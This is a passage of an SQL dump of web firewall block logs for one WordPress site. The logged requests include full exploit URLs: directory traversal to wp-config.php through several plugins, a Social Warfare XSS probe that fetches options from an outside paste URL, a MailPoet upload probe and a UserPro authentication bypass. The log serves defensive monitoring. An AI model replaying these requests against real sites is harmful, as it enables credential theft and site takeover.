Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(35,1627669593.998646,1627669593.919900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(36,1627669592.311264,1627669592.235000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(37,1627669600.024278,1627669599.942400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(38,1627669626.591097,1627669626.517400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(39,1627669625.864445,1627669625.788200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(40,1627670762.310851,1627670762.218200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(41,1627670768.793769,1627670768.719400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(42,1627670767.327632,1627670767.251700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(43,1627670774.587831,1627670774.511700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(44,1627670804.448095,1627670804.374000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(45,1627670803.754589,1627670803.666500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(46,1627688692.287729,1627688692.210500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(47,1627688698.805936,1627688698.729800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(48,1627688697.463320,1627688697.384600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(49,1627688704.388838,1627688704.311900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(50,1627688729.535765,1627688729.431600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(51,1627688728.693200,1627688728.619000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(52,1627719243.048716,1627719242.934400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(53,1627719249.817398,1627719249.731200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(54,1627719248.408218,1627719248.328800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(55,1627719255.618360,1627719255.538700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(56,1627719280.448812,1627719280.372600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(57,1627719279.760530,1627719279.686500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(58,1627737230.671890,1627737230.594400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(59,1627737236.723874,1627737236.639200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(60,1627737235.292807,1627737235.170000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(61,1627737242.142281,1627737242.067000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(62,1627737267.044094,1627737266.950700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(63,1627737266.334998,1627737266.241300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(64,1627737993.451049,1627737993.370900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(65,1627737999.386825,1627737999.310400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(66,1627737998.070230,1627737997.992400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(67,1627738005.307695,1627738005.231700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(68,1627738029.903006,1627738029.806300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(69,1627738029.212410,1627738029.138100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(70,1627741086.428237,1627741086.310800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(71,1627741092.560735,1627741092.487000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(72,1627741091.187412,1627741090.870200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(73,1627741098.228402,1627741098.116600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 